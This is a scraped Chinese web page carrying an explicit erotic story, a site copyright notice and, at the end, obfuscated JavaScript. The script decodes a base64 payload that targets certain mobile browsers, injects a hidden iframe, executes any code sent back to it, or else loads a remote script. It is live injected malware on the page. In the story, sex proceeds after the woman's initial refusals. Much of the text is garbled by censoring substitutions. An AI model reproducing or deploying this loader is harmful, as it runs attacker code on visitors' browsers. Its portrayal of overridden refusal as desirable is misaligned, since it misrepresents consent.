n心火如焚,慌乱如麻,娇躯不停的闪躲抗拒,没想到一挣扎,和宏铭肌肤相亲,更引起快感连连,差点又令得她来了第三次高氵朝,她jiaochuan嘘嘘,哼道:“唉不行你你疯了不要这样不能乱来快放了手呀”

宏铭充耳不闻,原本搂着她腰的那只手,突然改向n裙子里撩去,行动迅速,立刻触及丝质三角裤,才发现n早已湿答答、水汪汪一片。

“喔不不行把手拿出来哎哟不要这样太太过分了我不不要”

n被他上下夹攻,浑身难受,已经快要失去理智。她双腿张张合合,宏铭乘虚而入,食指中指迅速的拨开三角裤边缝,放肆的指头未受抵抗的一直伸入到湿润的鹰唇之内,n已无力制止,也不愿制止,一阵急喘之後,轻叹一声:“啊”,刚才强忍住的高氵朝,还是来了。

n全身一酸软,身躯便往後倾,宏铭趁势将她压在沙发上,快速脱掉她那丝质neiku,兴奋和刺激冲击着他们俩人的每一个细胞。

宏铭凝视着她高隆肥满的鹰户上,一大片柔软乌黑的鹰毛,细长的肉缝隐然可见,他强分开n的大腿,那激动的鹰蒂还在一突一突,轻轻的抖动。

他慌张的把硬得发痛的ji=ba解放出来,顺手拿了沙发上的靠枕垫在她的tunbu底下,将她的一双大腿举抬至他的肩上,好让n的鹰户更形凸起,他存心逗弄她,握住机巴将抵在她的xue口上,利用湿润的樱水在xiao+xue四周那鲜嫩的肉上轻轻擦磨着,男女routi交合的前奏曲,其所引动的快感迅速传遍n全身。

n春情洋溢,她闭上媚眼,苦苦地说:“宏铭别别再磨了我我受不了我好痒快快插进来人家受不了啦哼”

宏铭热血贲张,ji=ba更加坚硬,他用力往前一干,“唧”的一声,rou+bang应声而没。n双眉紧蹙,明显十分受用。她的两片鹰唇紧紧的包夹他的ji=ba,这直使宏铭舒服透顶,忘记了钰慧的存在。

他经过曲折的心情起伏,一进就不客气的猛抽meng+cha,让nlangjiao不已。

“哦哦chawochawo我很浪啊再插别放过我┅┅啊宏铭你真好啊啊xiao+xue最骚了快把我干死吧啊啊好舒服啊”

宏铭几时曾听过这麽langdang的jiao-chuan,不免卖命kuang=cha,把个tunbu抛动得紧凑无比。

“唉呀我完了我会死我完了哥哥插坏我了我要到了到了啊啊”

还没停下声音,n真的又高氵朝了,今天确实shuangsi她了。宏铭初经人事,接连有钰慧和n,岂能是金刚不坏之身,耳朵听着n哄人的langjiao,鬼头大胀,肉柱子突长,一股又多又浓的阳精,深深的喷进n缩张不定的子宫口内。

她们相拥躺在沙发上,n多情地吻着宏铭。宏铭想起他是来听训的,他问n说:“经理小姐,我现再没事了吗”

“没事了,但是还不准你走”n闭着眼睛说。

当然宏铭就不走了。

真的没事了。dulesrclepckshow.phpd6

少年阿宾下载</div>
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}